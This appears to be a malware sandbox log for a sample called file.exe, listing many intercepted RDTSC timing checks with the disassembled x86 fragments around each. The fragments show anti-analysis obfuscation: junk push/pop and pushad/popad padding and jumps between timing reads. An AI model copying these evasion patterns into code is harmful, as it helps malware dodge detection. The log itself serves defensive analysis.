              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EF405 second address: 6EF43F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC9h 0x00000007 jmp 00007FF8A95A6CC9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EF43F second address: 6EF452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b jnp 00007FF8A909BC22h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2AA1 second address: 6F2AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2AA9 second address: 6F2AAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2AAF second address: 6F2ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2ABD second address: 6F2AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2AC3 second address: 6F2AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF8A95A6CB6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F24C9 second address: 6F2529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF8A909BC1Dh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FF8A909BC1Ah 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FF8A909BC26h 0x0000001e je 00007FF8A909BC1Ch 0x00000024 jmp 00007FF8A909BC24h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2529 second address: 6F252F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F252F second address: 6F2533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F27F4 second address: 6F281C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FF8A95A6CB6h 0x00000009 jno 00007FF8A95A6CB6h 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FF8A95A6CBAh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F281C second address: 6F2822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4F5C second address: 6F4F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4F61 second address: 6F4F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A909BC1Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4F72 second address: 6F4F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CBFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A7A6 second address: 66A7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FF8A909BC29h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4B0B second address: 6F4B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4B13 second address: 6F4B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4B18 second address: 6F4B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4B1E second address: 6F4B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF8A909BC16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB61E second address: 6FB627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB627 second address: 6FB655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC23h 0x00000009 jmp 00007FF8A909BC25h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB655 second address: 6FB660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB660 second address: 6FB671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF8A909BC16h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB671 second address: 6FB675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB675 second address: 6FB67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB67B second address: 6FB694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8A95A6CC4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB694 second address: 6FB69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB69D second address: 6FB6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA0EA second address: 6FA0EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA0EE second address: 6FA0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6F5E second address: 6A6FC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF8A909BC27h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FF8A909BC28h 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FF8A909BC18h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D28BDh], eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6FC7 second address: 6A6FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA789 second address: 6FA78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA78F second address: 6FA798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA798 second address: 6FA7A8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF8A909BC16h 0x00000008 jnl 00007FF8A909BC16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA7A8 second address: 6FA7CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jnc 00007FF8A95A6CB6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB37B second address: 6FB380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB380 second address: 6FB392 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF8A95A6CB8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF74C second address: 6FF755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF755 second address: 6FF759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEDFA second address: 6FEE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC22h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE10 second address: 6FEE2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF109 second address: 6FF114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF8A909BC16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF114 second address: 6FF11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF2B5 second address: 6FF2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FF8A909BC1Eh 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF2C9 second address: 6FF2E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007FF8A95A6CB6h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007FF8A95A6CBCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702EF0 second address: 702F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A909BC20h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7032EA second address: 703309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A95A6CC5h 0x00000009 jne 00007FF8A95A6CB6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703309 second address: 70332F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8A909BC22h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709774 second address: 70977A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70977A second address: 70977E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70977E second address: 7097A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007FF8A95A6CB6h 0x00000010 ja 00007FF8A95A6CB6h 0x00000016 jo 00007FF8A95A6CB6h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7097A9 second address: 7097B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FF8A909BC16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709919 second address: 709920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709920 second address: 70992C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007FF8A909BC16h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709DEF second address: 709DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709DF5 second address: 709DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709DFB second address: 709E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB48 second address: 70AB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB4C second address: 70AB55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB55 second address: 70AB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Dh 0x00000009 jmp 00007FF8A909BC28h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB7F second address: 70AB8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B10C second address: 70B13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8A909BC26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B13A second address: 70B13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B13E second address: 70B15D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF8A909BC16h 0x0000000e jmp 00007FF8A909BC21h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713C27 second address: 713C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713C2B second address: 713C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712DEE second address: 712DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7130AF second address: 7130BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7130BB second address: 7130D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jl 00007FF8A95A6CCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FF8A95A6CB6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71337C second address: 713380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713380 second address: 713384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713384 second address: 71339E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A909BC20h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71339E second address: 7133A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713920 second address: 71394C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A909BC1Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF8A909BC26h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B319 second address: 71B343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FF8A95A6CBCh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8A95A6CBCh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jne 00007FF8A95A6CB6h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B343 second address: 71B349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B4BC second address: 71B4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B8F6 second address: 71B8FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71BD74 second address: 71BD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71CFA8 second address: 71CFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A909BC26h 0x00000009 jmp 00007FF8A909BC1Ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AEC2 second address: 71AECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF8A95A6CB6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AECE second address: 71AED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722AA9 second address: 722AB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A95A6CB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722AB5 second address: 722ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722ABB second address: 722ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7244AA second address: 7244BE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jg 00007FF8A909BC16h 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7244BE second address: 7244C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73699A second address: 73699F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73699F second address: 7369A9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF8A95A6CCDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736417 second address: 736421 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736421 second address: 736427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E36 second address: 739E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E40 second address: 739E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E44 second address: 739E54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E54 second address: 739E68 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007FF8A95A6CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FF8A95A6CB6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E68 second address: 739E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FF8A909BC1Eh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 ja 00007FF8A909BC16h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
